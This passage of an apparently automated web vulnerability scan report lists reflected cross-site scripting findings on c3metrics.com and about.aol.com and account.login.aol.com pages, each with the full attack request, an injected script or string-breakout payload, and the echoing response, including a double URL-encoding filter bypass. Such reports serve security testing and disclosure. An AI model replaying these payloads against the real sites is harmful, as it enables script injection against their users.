Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-02_7091964531304557202; expires=Tue, 03-May-2016 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_7091964531304557202; expires=Thu, 05-May-2011 01:15:02 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='7091964531304557202';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='ebffd<script>alert(1)</script>c867e4ea0b4';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 5f4c4<script>alert(1)</script>6979d01a44c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=4805f4c4<script>alert(1)</script>6979d01a44c&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:37 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s1; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=4805f4c4<script>alert(1)</script>6979d01a44c&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7e328<script>alert(1)</script>7a09c59ed8f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver7e328<script>alert(1)</script>7a09c59ed8f&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:15 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Content-Type: text/html
Set-Cookie: SERVERID=s15; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver7e328<script>alert(1)</script>7a09c59ed8f&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f789d<script>alert(1)</script>2df104e1cea was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72f789d<script>alert(1)</script>2df104e1cea HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:37 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s2; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72f789d<script>alert(1)</script>2df104e1cea&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

5.10. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d43fe"%3bbb310a036eb was submitted in the REST URL parameter 1. This input was echoed as d43fe";bb310a036eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetworkd43fe"%3bbb310a036eb/aol_pp HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:22 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10535
set-cookie: dcisid=2899132428.408601165.4098949120; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10535


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm64 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm64.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworkd43fe";bb310a036eb";
s_265.prop2="aol_pp";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.11. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aol_pp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f70b"%3b4d061b326ea was submitted in the REST URL parameter 2. This input was echoed as 6f70b";4d061b326ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork/6f70b"%3b4d061b326ea HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:38 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
set-cookie: dcisid=2899066892.3445211725.257032192; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm63 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm63.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork";
s_265.prop2="6f70b";4d061b326ea";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.12. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90851"%3b5cfb0851bbb was submitted in the REST URL parameter 1. This input was echoed as 90851";5cfb0851bbb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork90851"%3b5cfb0851bbb/aolcom_terms HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:16 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10547
set-cookie: dcisid=3360935356.688962381.1219365888; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld64 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ld64.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork90851";5cfb0851bbb";
s_265.prop2="aolcom_terms";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.13. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0463"%3bf8dd5e0d644 was submitted in the REST URL parameter 2. This input was echoed as f0463";f8dd5e0d644 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork/f0463"%3bf8dd5e0d644 HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:20 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
set-cookie: dcisid=2898935820.660193869.2622619648; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm61 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm61.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork";
s_265.prop2="f0463";f8dd5e0d644";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.14. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/copyright_infringement

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a8e"%3b36d39e4ac68 was submitted in the REST URL parameter 1. This input was echoed as 46a8e";36d39e4ac68 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork46a8e"%3b36d39e4ac68/copyright_infringement HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:41:24 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10567
set-cookie: dcisid=2899132428.408601165.4199612416; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10567


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm64 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-lm64.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork46a8e";36d39e4ac68";
s_265.prop2="copyright_infringement";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.15. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/copyright_infringement

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9271e"%3be315bc2c006 was submitted in the REST URL parameter 2. This input was echoed as 9271e";e315bc2c006 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork/9271e"%3be315bc2c006 HTTP/1.1
Host: about.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617329219-Repeat%7C1367689329219%3B%20s_nrgvo%3DRepeat%7C1367689329221%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 12:42:23 GMT
Server: AOLserver/4.0.10
X-RSP: 1
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Content-Type: text/html
ntCoent-Length: 10521
set-cookie: dcisid=3361000892.722516813.2628455424; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Content-Length: 10521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld65 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ld65.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork";
s_265.prop2="9271e";e315bc2c006";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.16. https://account.login.aol.com/_cqr/opr/opr.psp [authLev parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://account.login.aol.com
Path:   /_cqr/opr/opr.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bfe9%2522%253b0e2921fad4a was submitted in the authLev parameter. This input was echoed as 7bfe9";0e2921fad4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the authLev request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /_cqr/opr/opr.psp?sitedomain=bill.aol.com&authLev=S7bfe9%2522%253b0e2921fad4a&siteState=OrigUrl%3Dhttps%253A%252F%252Fbill.aol.com%252FSPortal%252Fjsp%252Fmain.jsp&lang=en&locale=us HTTP/1.1
Host: account.login.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617350589-Repeat%7C1367689350589%3B%20s_nrgvo%3DRepeat%7C1367689350591%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:43:36 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
